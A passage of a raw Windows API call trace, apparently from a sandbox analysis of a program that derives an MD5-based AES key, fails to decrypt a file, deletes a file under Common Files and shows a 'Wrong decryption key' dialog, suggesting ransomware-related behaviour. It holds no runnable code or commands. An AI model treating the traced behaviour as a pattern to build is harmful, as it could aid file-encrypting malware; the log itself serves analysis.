hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32928 | out: hHeap=0xbc0000) returned 1 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc6c0 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda170 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc678 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32928 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32918 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32918 | out: hHeap=0xbc0000) returned 1 [0260.200] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32918 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32918 | out: hHeap=0xbc0000) returned 1 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc678 | out: hHeap=0xbc0000) returned 1 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32928 | out: hHeap=0xbc0000) returned 1 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda170 | out: hHeap=0xbc0000) returned 1 [0260.200] PeekMessageW (in: lpMsg=0x7df6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df6ac) returned 0 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde58a0 | out: hHeap=0xbc0000) returned 1 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc6a8 | out: hHeap=0xbc0000) returned 1 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe205e0 | out: hHeap=0xbc0000) returned 1 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32938 | out: hHeap=0xbc0000) returned 1 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe205b8 | out: hHeap=0xbc0000) returned 1 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1a0 | out: hHeap=0xbc0000) returned 1 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32968 | out: hHeap=0xbc0000) returned 1 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe20540 | out: hHeap=0xbc0000) returned 1 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc780 | out: hHeap=0xbc0000) returned 1 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe20590 | out: hHeap=0xbc0000) returned 1 [0260.200] PeekMessageW (in: lpMsg=0x7df904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df904) returned 0 [0260.200] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20590 [0260.200] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc780 [0260.200] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32968 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc780 | out: hHeap=0xbc0000) returned 1 [0260.200] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20540 [0260.200] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc780 [0260.200] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1a0 [0260.200] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32938 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1a0 | out: hHeap=0xbc0000) returned 1 [0260.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32938 | out: hHeap=0xbc0000) returned 1 [0260.200] PeekMessageW (in: lpMsg=0x7df904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df904) returned 0 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe205b8 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1a0 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32938 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc6a8 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda170 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32928 [0260.201] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda170 | out: hHeap=0xbc0000) returned 1 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe205e0 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda170 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32918 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32908 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe32cd8 [0260.201] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0260.201] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32cd8 | out: hHeap=0xbc0000) returned 1 [0260.201] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32908 | out: hHeap=0xbc0000) returned 1 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xddc678 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde58a0 [0260.201] PeekMessageW (in: lpMsg=0x7df2b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df2b4) returned 0 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32908 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe328f8 [0260.201] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe328f8 | out: hHeap=0xbc0000) returned 1 [0260.201] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32908 | out: hHeap=0xbc0000) returned 1 [0260.201] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde58a0 | out: hHeap=0xbc0000) returned 1 [0260.201] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc678 | out: hHeap=0xbc0000) returned 1 [0260.201] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32918 | out: hHeap=0xbc0000) returned 1 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc678 [0260.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32918 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc690 [0260.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32918 | out: hHeap=0xbc0000) returned 1 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda140 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32918 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc648 [0260.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32918 | out: hHeap=0xbc0000) returned 1 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc660 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32918 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda110 [0260.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32918 | out: hHeap=0xbc0000) returned 1 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc618 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32918 [0260.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32918 | out: hHeap=0xbc0000) returned 1 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc630 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32918 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda0e0 [0260.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32918 | out: hHeap=0xbc0000) returned 1 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc5e8 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32918 [0260.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32918 | out: hHeap=0xbc0000) returned 1 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc600 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32918 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda0b0 [0260.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32918 | out: hHeap=0xbc0000) returned 1 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde58a0 [0260.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe205e0 | out: hHeap=0xbc0000) returned 1 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc5b8 [0260.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32918 [0260.203] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32918 | out: hHeap=0xbc0000) returned 1 [0260.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc5d0 [0260.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32918 [0260.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda080 [0260.203] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32918 | out: hHeap=0xbc0000) returned 1 [0260.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc588 [0260.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32918 [0260.203] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32918 | out: hHeap=0xbc0000) returned 1 [0260.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc5a0 [0260.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32918 [0260.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda050 [0260.203] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32918 | out: hHeap=0xbc0000) returned 1 [0260.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc558 [0260.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32918 [0260.203] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32918 | out: hHeap=0xbc0000) returned 1 [0260.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32918 [0260.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc570 [0260.204] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda020 [0260.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32908 [0260.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe328f8 [0260.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc528 [0260.204] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda020 | out: hHeap=0xbc0000) returned 1 [0260.204] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32908 | out: hHeap=0xbc0000) returned 1 [0260.204] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc528 | out: hHeap=0xbc0000) returned 1 [0260.204] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe328f8 | out: hHeap=0xbc0000) returned 1 [0260.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe205e0 [0260.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe328f8 [0260.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc528 [0260.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32908 [0260.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe328e8 [0260.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda020 [0260.204] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc528 | out: hHeap=0xbc0000) returned 1 [0260.204] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32908 | out: hHeap=0xbc0000) returned 1 [0260.204] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda020 | out: hHeap=0xbc0000) returned 1 [0260.204] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe328e8 | out: hHeap=0xbc0000) returned 1 [0260.205] CryptAcquireContextA (in: phProv=0x7df288, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x7df288*=0xc271b0) returned 1 [0260.206] CryptCreateHash (in: hProv=0xc271b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x7deff8 | out: phHash=0x7deff8) returned 1 [0260.206] CryptHashData (hHash=0xe56b60, pbData=0xddc4e0, dwDataLen=0xd, dwFlags=0x1) returned 1 [0260.206] CryptDeriveKey (in: hProv=0xc271b0, Algid=0x660e, hBaseData=0xe56b60, dwFlags=0x1, phKey=0x7deff8 | out: phKey=0x7deff8*=0xe56ba0) returned 1 [0260.206] CryptDestroyHash (hHash=0xe56b60) returned 1 [0260.207] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0260.207] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df730 | out: lpNewFilePointer=0x0) returned 1 [0260.208] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df780 | out: lpNewFilePointer=0x0) returned 1 [0260.208] ReadFile (in: hFile=0x610, lpBuffer=0xe64ec8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7a8, lpOverlapped=0x0 | out: lpBuffer=0xe64ec8*, lpNumberOfBytesRead=0x7df7a8*=0x10, lpOverlapped=0x0) returned 1 [0260.208] ReadFile (in: hFile=0x610, lpBuffer=0xe64ec8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7a8, lpOverlapped=0x0 | out: lpBuffer=0xe64ec8*, lpNumberOfBytesRead=0x7df7a8*=0x0, lpOverlapped=0x0) returned 1 [0260.209] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda020 | out: hHeap=0xbc0000) returned 1 [0260.209] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32928 | out: hHeap=0xbc0000) returned 1 [0260.209] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc7f8 | out: hHeap=0xbc0000) returned 1 [0260.209] CryptGetKeyParam (in: hKey=0xe56ba0, dwParam=0x7, pbData=0xe32868, pdwDataLen=0x7deae0, dwFlags=0x0 | out: pbData=0xe32868*=0x660e, pdwDataLen=0x7deae0*=0x4) returned 1 [0260.209] CryptDecrypt (in: hKey=0xe56ba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe84ed8, pdwDataLen=0x7df010 | out: pbData=0xe84ed8, pdwDataLen=0x7df010) returned 0 [0260.210] CryptDestroyKey (hKey=0xe56ba0) returned 1 [0260.211] CryptReleaseContext (hProv=0xc271b0, dwFlags=0x0) returned 1 [0260.211] DeleteFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370" (normalized: "c:\\progra~2\\common~1\\2620738370")) returned 1 [0260.212] FindNextFileW (in: hFindFile=0xe56aa0, lpFindFileData=0x7dfa58 | out: lpFindFileData=0x7dfa58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36ba8410, ftCreationTime.dwHighDateTime=0x1d661be, ftLastAccessTime.dwLowDateTime=0x3c8c1430, ftLastAccessTime.dwHighDateTime=0x1d661be, ftLastWriteTime.dwLowDateTime=0x3c8cb070, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x7dfa90, dwReserved1=0x759a14dd, cFileName="2620738370", cAlternateFileName="262073~2")) returned 0 [0260.212] FindClose (in: hFindFile=0xe56aa0 | out: hFindFile=0xe56aa0) returned 1 [0260.212] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32cd8 | out: hHeap=0xbc0000) returned 1 [0260.212] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a68 | out: hHeap=0xbc0000) returned 1 [0260.212] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda470 | out: hHeap=0xbc0000) returned 1 [0260.213] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a58 | out: hHeap=0xbc0000) returned 1 [0260.213] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde5810 | out: hHeap=0xbc0000) returned 1 [0260.213] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a48 | out: hHeap=0xbc0000) returned 1 [0260.213] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc27128 | out: hHeap=0xbc0000) returned 1 [0260.213] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a78 | out: hHeap=0xbc0000) returned 1 [0260.213] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcb58 | out: hHeap=0xbc0000) returned 1 [0260.213] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda410 | out: hHeap=0xbc0000) returned 1 [0260.213] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe20068 | out: hHeap=0xbc0000) returned 1 [0260.213] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0260.213] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20068 [0260.213] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda410 [0260.213] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32a78 [0260.213] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a78 | out: hHeap=0xbc0000) returned 1 [0260.213] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb58 [0260.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32a78 [0260.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda470 [0260.216] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a78 | out: hHeap=0xbc0000) returned 1 [0260.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda4a0 [0260.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32a78 [0260.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc918 [0260.216] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a78 | out: hHeap=0xbc0000) returned 1 [0260.216] MessageBoxW (hWnd=0x0, lpText="Wrong decryption key", lpCaption="Error!", uType=0x10010) returned 1 [0260.222] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.222] NtdllDialogWndProc_W () returned 0x1 [0260.223] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.223] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.223] NtdllDialogWndProc_W () returned 0x0 [0260.271] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.271] GetWindowLongW (hWnd=0x60174, nIndex=-20) returned 256 [0260.271] NtdllDialogWndProc_W () returned 0x1 [0260.271] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.271] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.271] GetClientRect (in: hWnd=0x60174, lpRect=0x7df730 | out: lpRect=0x7df730) returned 1 [0260.271] GetCursorPos (in: lpPoint=0x7df740 | out: lpPoint=0x7df740*(x=897, y=502)) returned 1 [0260.272] ScreenToClient (in: hWnd=0x60174, lpPoint=0x7df740 | out: lpPoint=0x7df740) returned 1 [0260.272] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0260.272] SetCursor (hCursor=0x10003) returned 0x10007 [0260.272] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.272] NtdllDialogWndProc_W () returned 0x0 [0260.272] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.272] NtdllDialogWndProc_W () returned 0x1 [0260.272] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.272] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.272] GetSysColor (nIndex=15) returned 0xf0f0f0 [0260.272] SetBkColor (hdc=0x3e0101d8, color=0xf0f0f0) returned 0xf0f0f0 [0260.272] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.272] NtdllDialogWndProc_W () returned 0x0 [0260.272] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.272] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.273] GetSysColor (nIndex=15) returned 0xf0f0f0 [0260.273] SetBkColor (hdc=0x3e0101d8, color=0xf0f0f0) returned 0xf0f0f0 [0260.273] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.273] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.273] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0260.273] NtdllDialogWndProc_W () returned 0x0 [0260.273] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.273] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.273] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0260.273] NtdllDialogWndProc_W () returned 0x0 [0260.288] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.288] GetWindowLongW (hWnd=0x60174, nIndex=-20) returned 256 [0260.288] NtdllDialogWndProc_W () returned 0x1 [0260.288] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.288] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.288] GetClientRect (in: hWnd=0x60174, lpRect=0x7df730 | out: lpRect=0x7df730) returned 1 [0260.288] GetCursorPos (in: lpPoint=0x7df740 | out: lpPoint=0x7df740*(x=897, y=502)) returned 1 [0260.288] ScreenToClient (in: hWnd=0x60174, lpPoint=0x7df740 | out: lpPoint=0x7df740) returned 1 [0260.288] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0260.288] SetCursor (hCursor=0x10003) returned 0x10003 [0260.288] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.288] NtdllDialogWndProc_W () returned 0x0 [0260.288] GetForegroundWindow () returned 0x70148 [0260.288] GetWindowLongW (hWnd=0x70148, nIndex=-21) returned 8256456 [0260.332] GetForegroundWindow () returned 0x70148 [0260.332] GetWindowLongW (hWnd=0x70148, nIndex=-21) returned 8256456 [0260.369] GetForegroundWindow () returned 0x70148 [0260.369] GetWindowLongW (hWnd=0x70148, nIndex=-21) returned 8256456 [0260.420] GetForegroundWindow () returned 0x70148 [0260.420] GetWindowLongW (hWnd=0x70148, nIndex=-21) returned 8256456 [0260.429] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20a) returned 0xc07618 [0260.429] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a78 [0260.429] Shell_NotifyIconW (dwMessage=0x1, lpData=0x7df080) returned 1 [0260.430] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc07618 | out: hHeap=0xbc0000) returned 1 [0260.430] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a78 | out: hHeap=0xbc0000) returned 1 [0260.430] KillTimer (hWnd=0x40172, uIDEvent=0x1) returned 1 [0260.430] SetTimer (hWnd=0x40172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0260.469] GetForegroundWindow () returned 0x6016e [0260.469] GetWindowLongW (hWnd=0x6016e, nIndex=-21) returned 0 [0260.509] GetForegroundWindow () returned 0x70148 [0260.509] GetWindowLongW (hWnd=0x70148, nIndex=-21) returned 8256456 [0260.549] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.550] NtdllDialogWndProc_W () returned 0x0 [0260.550] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.550] NtdllDialogWndProc_W () returned 0x0 [0260.551] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.551] NtdllDialogWndProc_W () returned 0x0 [0260.551] NtdllDefWindowProc_W () returned 0x0 [0260.551] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.551] NtdllDialogWndProc_W () returned 0x1 [0260.552] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.552] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.552] NtdllDialogWndProc_W () returned 0x0 [0260.555] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda410 | out: hHeap=0xbc0000) returned 1 [0260.555] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda470 | out: hHeap=0xbc0000) returned 1 [0260.555] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcb58 | out: hHeap=0xbc0000) returned 1 [0260.555] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc918 | out: hHeap=0xbc0000) returned 1 [0260.555] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda4a0 | out: hHeap=0xbc0000) returned 1 [0260.555] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe20068 | out: hHeap=0xbc0000) returned 1 [0260.555] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0260.555] TranslateAcceleratorW (hWnd=0x60174, hAccTable=0x500d5, lpMsg=0x7dfdb4) returned 0 [0260.555] TranslateMessage (lpMsg=0x7dfdb4) returned 0 [0260.555] DispatchMessageW (lpMsg=0x7dfdb4) returned 0x0 [0260.555] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, 